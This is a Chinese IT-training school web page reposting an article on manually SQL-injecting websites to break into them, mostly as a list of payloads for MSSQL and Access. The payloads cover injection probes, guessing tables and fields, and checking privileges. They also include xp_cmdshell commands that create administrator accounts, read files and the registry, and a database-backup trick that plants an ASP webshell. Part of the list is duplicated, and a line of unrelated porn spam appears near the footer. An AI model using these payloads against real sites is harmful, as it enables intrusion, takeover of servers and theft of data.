看看黑客如何手工注入方法入侵網(wǎng)站的

不僅僅統(tǒng)招學(xué)歷喲

熱門專業(yè)！
大學(xué)校園！
就業(yè)保障！
拿學(xué)歷又能高薪就業(yè)，誰能不愛！

了解詳情>

鄭州北大青鳥翔天信鴿參加“安心學(xué)習(xí)·放心就業(yè)”公約簽約儀式

讓每一個家庭“安心”、“放心”

教學(xué)為本
師愛為魂
安心學(xué)習(xí)
放心就業(yè)

了解詳情>

深耕細(xì)作IT職業(yè)教育15載

青鳥之星教學(xué)質(zhì)量大獎
卓越風(fēng)云人物
北大青鳥中心理事會成員
七項榮耀載譽而行！

了解詳情>

我們教學(xué)怎么樣

實力見證
網(wǎng)絡(luò)組一等獎
網(wǎng)絡(luò)組二等獎
軟件組四等獎
200家校區(qū)脫穎而出！

了解更多>

北大青鳥職業(yè)IT20周年

重承諾
守信用
放心品牌
放心學(xué)習(xí)
靠靠譜譜好就業(yè)！

了解更多>

我命由我不由天

學(xué)個性的技術(shù)
做愛做的事
掙滿意的錢
衣食無憂
選擇寬且高大尚！

了解更多>

我們靠不靠譜

14年辦學(xué)
14年磨練
14年成長
14年探索
只為讓每個學(xué)員成材！

了解更多>

不打工也牛掰

好工作
好環(huán)境
高薪資
好課程
支持你成為有“錢”人！

了解更多>

學(xué)IT就讀北大青鳥

好工作
好未來
好老師
好課程
支持你成為受人尊敬的人！

作者：北大青鳥添加時間：04-01 瀏覽次數(shù)：0

我們在入侵網(wǎng)站的時候，有時候直接靠工具是無法找到注入點的，所以很多時候都要用到手工注入，下面列舉一些方法：

1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是否是mssql ;and user>0

3.注入?yún)?shù)是字符’and [查詢條件] and ”=’

4.搜索時沒過濾參數(shù)的’and [查詢條件] and ‘%25′=’

5.判斷數(shù)據(jù)庫系統(tǒng)

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜數(shù)據(jù)庫 ;and (select Count(*) from [數(shù)據(jù)庫名])>0

7.猜字段 ;and (select Count(字段名) from 數(shù)據(jù)庫名)>0 1.判斷是否有注入;and 1=1 ;and 1=2

2.初步判斷是否是mssql ;and user>0

3.注入?yún)?shù)是字符’and [查詢條件] and ”=’

4.搜索時沒過濾參數(shù)的’and [查詢條件] and ‘%25′=’

5.判斷數(shù)據(jù)庫系統(tǒng)

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

6.猜數(shù)據(jù)庫 ;and (select Count(*) from [數(shù)據(jù)庫名])>0

7.猜字段 ;and (select Count(字段名) from 數(shù)據(jù)庫名)>0

8.猜字段中記錄長度 ;and (select top 1 len(字段名) from 數(shù)據(jù)庫名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 數(shù)據(jù)庫名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 數(shù)據(jù)庫名)>0

10.測試權(quán)限結(jié)構(gòu)（mssql）

;and 1=(select IS_SRVROLEMEMBER(‘sysadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘serveradmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘setupadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘securityadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘diskadmin’));–

;and 1=(select IS_SRVROLEMEMBER(‘bulkadmin’));–

;and 1=(select IS_MEMBER(‘db_owner’));–

11.添加mssql和系統(tǒng)的帳戶

;exec master.dbo.sp_addlogin username;–

;exec master.dbo.sp_password null,username,password;–

;exec master.dbo.sp_addsrvrolemember sysadmin username;–

;exec master.dbo.xp_cmdshell ‘net user username password

/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;–

;exec master.dbo.xp_cmdshell ‘net user username password /add’;–

;exec master.dbo.xp_cmdshell ‘net localgroup administrators username /add’;–

12.(1)遍歷目錄

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree ‘c:\’

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not in(‘上步得到的paths’))>)

(2)遍歷目錄

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));–

;insert temp exec master.dbo.xp_availablemedia;– 獲得當(dāng)前所有驅(qū)動器

;insert into temp(id) exec master.dbo.xp_subdirs ‘c:\’;– 獲得子目錄列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree ‘c:\’;– 獲得所有子目錄的目錄樹構(gòu)

;insert into temp(id) exec master.dbo.xp_cmdshell ‘type c:\web\index.asp’;– 查看文件的內(nèi)容

13.mssql中的存儲過程

xp_regenumvalues 注冊表根鍵, 子鍵

;exec xp_regenumvalues ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Run’ 以多個記錄集方式返回所有鍵值

xp_regread 根鍵,子鍵,鍵值名

;exec xp_regread

‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'CommonFilesDir’ 返回制定鍵的值

xp_regwrite 根鍵,子鍵, 值名, 值類型, 值

值類型有2種REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’,'reg_sz’,'hello’ 寫入注冊表

xp_regdeletevalue 根鍵,子鍵,值名

exec xp_regdeletevalue ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion’,'TestValueName’ 刪除某個值

xp_regdeletekey ‘HKEY_LOCAL_MACHINE’,'SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey’ 刪除鍵,包括該鍵下所有值

14.mssql的backup創(chuàng)建webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’c:\l.asp’;

15.mssql內(nèi)置函數(shù)

;and (select @@version)>0 獲得Windows的版本號

;and user_name()=’dbo’ 判斷當(dāng)前系統(tǒng)的連接用戶是不是sa

;and (select user_name())>0 爆當(dāng)前系統(tǒng)的連接用戶

;and (select db_name())>0 得到當(dāng)前連接的數(shù)據(jù)庫

16.簡潔的webshell

use model

create table cmd(str image);

insert into cmd(str) values (”);

backup database model to disk=’g:\wwwtest\l.asp’;

文章由鄭州北大青鳥搜集整理，轉(zhuǎn)載請注明！

本文由站河南北大青鳥校區(qū)整編而成，如需了解更多IT資訊類的文章、新聞、課程和學(xué)習(xí)技巧、就業(yè)案例、招生詳情等問題，可以對在線咨詢老師進(jìn)行一對一問答！

熱點資訊

選擇靠譜的學(xué)校

入學(xué)測試與試聽

體驗之后再決定

決定之后要努力

支持你受人尊敬

聯(lián)系電話：400-638-3521/
值班熱線：15225191462(手機)

學(xué)校介紹: 中心簡介; 青鳥概況; 乘車路線; 校區(qū)環(huán)境

相關(guān)課程: Benet課程; ACCP課程; 軟件課程; 安卓課程

校區(qū)新聞: 校區(qū)新聞; 就業(yè)新聞; 行業(yè)新聞; 媒體新聞; 招生解答

學(xué)員就業(yè): 就業(yè)明星; 就業(yè)感言; 求職技巧

技術(shù)交流: 網(wǎng)絡(luò)技術(shù); 服務(wù)器管理; 數(shù)據(jù)庫; 網(wǎng)絡(luò)安全

精彩專題: 高中生專區(qū); 大學(xué)生專區(qū); 跳槽轉(zhuǎn)行區(qū); 自考生專區(qū)

鄭州北大青鳥翔天信鴿軟件學(xué)院地址：鄭州市文化路90號河南財經(jīng)政法大學(xué)文南校區(qū)1號教學(xué)樓網(wǎng)站地圖乘車路線 - 聯(lián)系我們 - 網(wǎng)站RSS - 河南北大青鳥招聘

豫ICP備10022989號-1 辦學(xué)許可證號：1601035000013 豫公網(wǎng)安備 41010502002899號

分享到：

欧美人妻日韩精品,久久青青草原国产精品最新片,亚洲特级毛片av无码专区,一本一道色欲综合网中文字幕

看看黑客如何手工注入方法入侵網(wǎng)站的

推薦資訊

熱點資訊